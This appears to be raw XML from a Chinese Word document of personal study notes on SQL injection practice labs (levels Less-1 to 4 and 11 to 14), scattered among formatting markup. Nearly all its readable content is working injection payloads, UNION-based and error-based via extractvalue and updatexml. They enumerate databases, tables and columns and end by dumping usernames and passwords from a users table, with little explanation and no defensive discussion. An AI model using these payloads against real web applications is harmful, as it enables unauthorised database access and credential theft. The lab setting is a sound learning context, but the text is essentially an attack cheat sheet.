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SQL注入</w:t>
      </w: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Less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-1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一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UNION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联合查询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判断注入点（存在注入）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?id=1' and 1=1 --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猜字段（字段数：3）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?id=1' order by 3 -- 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判断回显点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' union select 1,2,3 --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查询数据库（database（））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' union select 1,2,database()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查表名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' union select 1,2,group_concat(table_name) from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information_schema.tables where table_schema=database()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' union select 1,2,group_concat(column_name) from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information_schema.columns where table_name='user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'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.users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' union select 1,2,group_concat(username,':',password) from users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二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extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">value()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eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查询数据库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?id=1' and extractvalue(1,concat(0x7e,(select database())))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?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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?id=1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user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')))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?id=1' and extractvalue(1,concat(0x7e,(select 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group_concat(username,':',password) from users)))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三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date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xml()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查询数据库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?id=1' and updatexml(1,concat(0x7e,(select database())),1)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?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1)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Less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-2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一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UNION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联合查询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判断注入点（存在注入）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?id=1 and 1=1 --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猜字段（字段数：3）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?id=1 order by 3 --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判断回显点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?id=1.1 union select 1,2,3 --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查询数据库（database（））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 union select 1,2,database()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查表名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 union select 1,2,group_concat(table_name) from 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information_schema.tables where table_schema=database() -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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 union select 1,2,group_concat(column_name) from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information_schema.columns where table_name='user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'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.users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 union select 1,2,group_concat(username,':',password) from users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二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extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">value()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查询数据库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 and extractvalue(1,concat(0x7e,(select database())))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 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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?id=1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user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')))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 and extractvalue(1,concat(0x7e,(select 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group_concat(username,':',password) from users)))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三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date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xml()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查询数据库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?id=1 and updatexml(1,concat(0x7e,(select database())),1)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 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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?id=1 and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1)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Less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-3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一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UNION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联合查询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判断注入点（存在注入）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?id=1” and 1=1 --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猜字段（字段数：3）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?id=1” order by 3 --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判断回显点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” union select 1,2,3 --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查询数据库（database（））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” union select 1,2,database()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查表名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” union select 1,2,group_concat(table_name) from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information_schema.tables where table_schema=database()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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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查字段名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr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” union select 1,2,group_concat(column_name) from </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:num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information_schema.columns where table_name='user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'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.users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” union select 1,2,group_concat(username,':',password) from users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二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extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">value()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查询数据库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?id=1” and extractvalue(1,concat(0x7e,(select database())))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?id=1” and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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?id=1” and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user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')))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?id=1” and extractvalue(1,concat(0x7e,(select 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group_concat(username,':',password) from users)))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三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date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xml()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查询数据库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?id=1” and updatexml(1,concat(0x7e,(select database())),1)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?id=1” and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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?id=1” and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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 xml:space="preserve">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?id=1” and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1)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Less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>-4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一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UNION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联合查询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判断注入点（存在注入）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?id=1”) and 1=1 --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猜字段（字段数：3）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?id=1”) order by 3 --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判断回显点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”) union select 1,2,3 --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查询数据库（database（））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>”) union select 1,2,database()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查表名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”) union select 1,2,group_concat(table_name) from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information_schema.tables where table_schema=database()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?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">”) union select 1,2,group_concat(column_name) from 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information_schema.columns where table_name='user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'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7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.users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?id=1.1”) union select 1,2,group_concat(username,':',password) from users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二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extract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">value()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查询数据库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?id=1”) and extractvalue(1,concat(0x7e,(select database())))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?id=1”) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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?id=1”) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='user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')))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?id=1”) and extractvalue(1,concat(0x7e,(select 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group_concat(username,':',password) from users)))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三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date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">xml()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查询数据库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?id=1”) and updatexml(1,concat(0x7e,(select database())),1)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查询表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?id=1”) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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?id=1”) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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?id=1”) and updatexml(1,concat(0x7e,(select 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group_concat(username,':',password) from users)),1)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L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>ess-11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设置代理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31775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3093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抓包：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2390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6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UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>联合查询</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="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判断注入点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' or 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--qwe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31578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猜字段（2个字段）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' or 1=1 order by 2 --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9508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7355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判断回显点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' union select 1,2 --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31724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查数据库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' union select 1,database() -- qw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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307086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查表名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' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --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3105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查字段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' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' --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8936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6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' union select 1,group_concat(username,':',password) from users --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9273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pStyle w:val="6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extractvalue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判断注入点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' or 1=1 –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3157855"/>
            <wp:effectExtent l="0" t="0" r="254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查数据库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' and extractvalue(1,concat(0x7e,(select database()))) --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9622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查表名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' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --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9425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' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --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8575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' and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users))) --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9705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pStyle w:val="6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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updatexml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查数据库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' and updatexml(1,concat(0x7e,(select database())),1) --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9508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查表名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' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) --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9095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' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --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8651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' and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1) -- qwe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="29394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Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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UNION </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>联合注入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判断注入点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“) or 1=1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猜字段（2个字段）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“) or 1=1 order by 2 --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查数据库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“) union select 1,database()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查表名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“) union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()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“) union select 1,group_concat(column_name) from information_schema.columns where table_name='users'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6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“) union select 1,group_concat(username,':',password) from users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</w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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xtractva;ue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查数据库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“) and extractvalue(1,concat(0x7e,(select database())))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查表名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“) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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“) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))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“) and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users)))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rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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pdatexml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查数据库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“) and updatexml(1,concat(0x7e,(select database())),1)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查表名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“) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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“) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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“) and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1)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Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>13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(一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xtractva;ue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判断注入点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 xml:space="preserve">‘) or 1=1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查数据库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‘) and extractvalue(1,concat(0x7e,(select database())))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查表名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‘) and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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‘) and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))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‘) and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users)))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二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pdatexml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查数据库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‘) and updatexml(1,concat(0x7e,(select database())),1)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查表名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‘) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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‘) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)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4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‘) and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1)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</w:p>
    <w:p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Less-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>14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(一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xtractva;ue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判断注入点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“ or 1=1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>--+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查数据库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“ and extractvalue(1,concat(0x7e,(select database())))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查表名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“ and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())))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“ and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')))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“ and extractvalue(1,concat(0x7e,(select group_concat(username,':',password) from users)))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rFonts w:hint="eastAsia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二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pdatexml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>报错注入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查数据库</w:t>
      </w:r>
    </w:p>
    <w:p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“ and updatexml(1,concat(0x7e,(select database())),1)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查表名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“ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)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查字段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“ and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+</w:t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 users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>表中username，password字段值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“ and updatexml(1,concat(0x7e,(select group_concat(username,':',password) from users)),1) --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="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028DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="076028DC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="444" w:hanging="444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A6744F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A6744F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0C4C97"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5E0C4C97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B890FBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B890FBC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="444" w:hanging="444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DB6"/>
    <w:rsid w:val="00011718"/>
    <w:rsid w:val="00180E55"/>
    <w:rsid w:val="002775E2"/>
    <w:rsid w:val="002C67DA"/>
    <w:rsid w:val="002E1E7F"/>
    <w:rsid w:val="002E59DF"/>
    <w:rsid w:val="0033322C"/>
    <w:rsid w:val="00490DC8"/>
    <w:rsid w:val="004C5984"/>
    <w:rsid w:val="005016BC"/>
    <w:rsid w:val="005901BE"/>
    <w:rsid w:val="006064A6"/>
    <w:rsid w:val="006D3108"/>
    <w:rsid w:val="00775CFD"/>
    <w:rsid w:val="00BA6EC6"/>
    <w:rsid w:val="00BE38F4"/>
    <w:rsid w:val="00C07342"/>
    <w:rsid w:val="00CD18B6"/>
    <w:rsid w:val="00CE7CD4"/>
    <w:rsid w:val="00D80B6E"/>
    <w:rsid w:val="00DC0513"/>
    <w:rsid w:val="00DD1DB6"/>
    <w:rsid w:val="00DF6F4E"/>
    <w:rsid w:val="00E53E85"/>
    <w:rsid w:val="00F718D1"/>
    <w:rsid w:val="01D55132"/>
    <w:rsid w:val="02106004"/>
    <w:rsid w:val="02AB1580"/>
    <w:rsid w:val="032625B3"/>
    <w:rsid w:val="043E2DF7"/>
    <w:rsid w:val="07246270"/>
    <w:rsid w:val="077E0A28"/>
    <w:rsid w:val="078123CD"/>
    <w:rsid w:val="0A715A68"/>
    <w:rsid w:val="0A91233C"/>
    <w:rsid w:val="0B261F4A"/>
    <w:rsid w:val="0E072F19"/>
    <w:rsid w:val="0E1F05DB"/>
    <w:rsid w:val="0F350C0E"/>
    <w:rsid w:val="0F7B6A5F"/>
    <w:rsid w:val="0F963441"/>
    <w:rsid w:val="132C3E7F"/>
    <w:rsid w:val="1421735D"/>
    <w:rsid w:val="14B63E29"/>
    <w:rsid w:val="16D04B28"/>
    <w:rsid w:val="199F38A4"/>
    <w:rsid w:val="1C9D7340"/>
    <w:rsid w:val="1CC409A9"/>
    <w:rsid w:val="1D856C0B"/>
    <w:rsid w:val="1F321F23"/>
    <w:rsid w:val="20443C28"/>
    <w:rsid w:val="20675B81"/>
    <w:rsid w:val="21E717BC"/>
    <w:rsid w:val="238D22CB"/>
    <w:rsid w:val="24C7274D"/>
    <w:rsid w:val="2600467F"/>
    <w:rsid w:val="280F7375"/>
    <w:rsid w:val="2CBA4523"/>
    <w:rsid w:val="2E891D25"/>
    <w:rsid w:val="2F3A2E9A"/>
    <w:rsid w:val="2FF31702"/>
    <w:rsid w:val="30391ED7"/>
    <w:rsid w:val="30DB5227"/>
    <w:rsid w:val="30F947C3"/>
    <w:rsid w:val="31A60F0A"/>
    <w:rsid w:val="32B266EA"/>
    <w:rsid w:val="349E16A6"/>
    <w:rsid w:val="35166C14"/>
    <w:rsid w:val="36360AE1"/>
    <w:rsid w:val="36CF0830"/>
    <w:rsid w:val="375B44F5"/>
    <w:rsid w:val="383A7223"/>
    <w:rsid w:val="38F2098E"/>
    <w:rsid w:val="3A366FD4"/>
    <w:rsid w:val="3C374999"/>
    <w:rsid w:val="3D0E4BDB"/>
    <w:rsid w:val="3D276E1B"/>
    <w:rsid w:val="3D6F7DFD"/>
    <w:rsid w:val="41A061F8"/>
    <w:rsid w:val="42FC74CC"/>
    <w:rsid w:val="44363801"/>
    <w:rsid w:val="443D7E86"/>
    <w:rsid w:val="45196B78"/>
    <w:rsid w:val="45A136BF"/>
    <w:rsid w:val="45E37EE7"/>
    <w:rsid w:val="466216EC"/>
    <w:rsid w:val="470525EB"/>
    <w:rsid w:val="4711496D"/>
    <w:rsid w:val="481877F1"/>
    <w:rsid w:val="484D4AF5"/>
    <w:rsid w:val="48657BFF"/>
    <w:rsid w:val="491235BD"/>
    <w:rsid w:val="49522F0D"/>
    <w:rsid w:val="4C1A7324"/>
    <w:rsid w:val="4C214866"/>
    <w:rsid w:val="4C5B1A02"/>
    <w:rsid w:val="4CC60DA4"/>
    <w:rsid w:val="4E497D14"/>
    <w:rsid w:val="50002D6D"/>
    <w:rsid w:val="501305DA"/>
    <w:rsid w:val="510660E7"/>
    <w:rsid w:val="51721580"/>
    <w:rsid w:val="527B0A03"/>
    <w:rsid w:val="528C0EA3"/>
    <w:rsid w:val="533E58CD"/>
    <w:rsid w:val="54084734"/>
    <w:rsid w:val="55E867C8"/>
    <w:rsid w:val="55EE5357"/>
    <w:rsid w:val="55FC1611"/>
    <w:rsid w:val="578B049F"/>
    <w:rsid w:val="578C19F0"/>
    <w:rsid w:val="57A322BA"/>
    <w:rsid w:val="581B0638"/>
    <w:rsid w:val="583D5F8D"/>
    <w:rsid w:val="59270992"/>
    <w:rsid w:val="5BF11F3E"/>
    <w:rsid w:val="5C595DB7"/>
    <w:rsid w:val="5C7C4FA2"/>
    <w:rsid w:val="5CAD3064"/>
    <w:rsid w:val="5D001FEC"/>
    <w:rsid w:val="5D4A3ACD"/>
    <w:rsid w:val="5E330961"/>
    <w:rsid w:val="604C00B0"/>
    <w:rsid w:val="61822383"/>
    <w:rsid w:val="627E3637"/>
    <w:rsid w:val="63C87F06"/>
    <w:rsid w:val="6519080B"/>
    <w:rsid w:val="663B1A43"/>
    <w:rsid w:val="66490509"/>
    <w:rsid w:val="673E0329"/>
    <w:rsid w:val="67D2063F"/>
    <w:rsid w:val="68494CBA"/>
    <w:rsid w:val="685F5892"/>
    <w:rsid w:val="6963597E"/>
    <w:rsid w:val="6A1A3D6D"/>
    <w:rsid w:val="6ED11BDE"/>
    <w:rsid w:val="6FCA6B74"/>
    <w:rsid w:val="6FF6401F"/>
    <w:rsid w:val="70AA37ED"/>
    <w:rsid w:val="74F31177"/>
    <w:rsid w:val="75C30A56"/>
    <w:rsid w:val="75D329CE"/>
    <w:rsid w:val="76B56F8F"/>
    <w:rsid w:val="76C96DBA"/>
    <w:rsid w:val="774F11D8"/>
    <w:rsid w:val="77772C1B"/>
    <w:rsid w:val="77931418"/>
    <w:rsid w:val="78E70330"/>
    <w:rsid w:val="78F65745"/>
    <w:rsid w:val="7AD07CB2"/>
    <w:rsid w:val="7C080C98"/>
    <w:rsid w:val="7D834F9D"/>
    <w:rsid w:val="7DEF01D2"/>
    <w:rsid w:val="7F463307"/>
    <w:rsid w:val="7F5E2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3"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD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31</Pages>
  <Words>2118</Words>
  <Characters>12077</Characters>
  <Lines>100</Lines>
  <Paragraphs>28</Paragraphs>
  <TotalTime>323</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>14167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2020-06-29T14:18:00Z</dcterms:created>
  <dc:creator>414524021@qq.com</dc:creator>
  <cp:lastModifiedBy>京华倦客</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-03T01:12:35Z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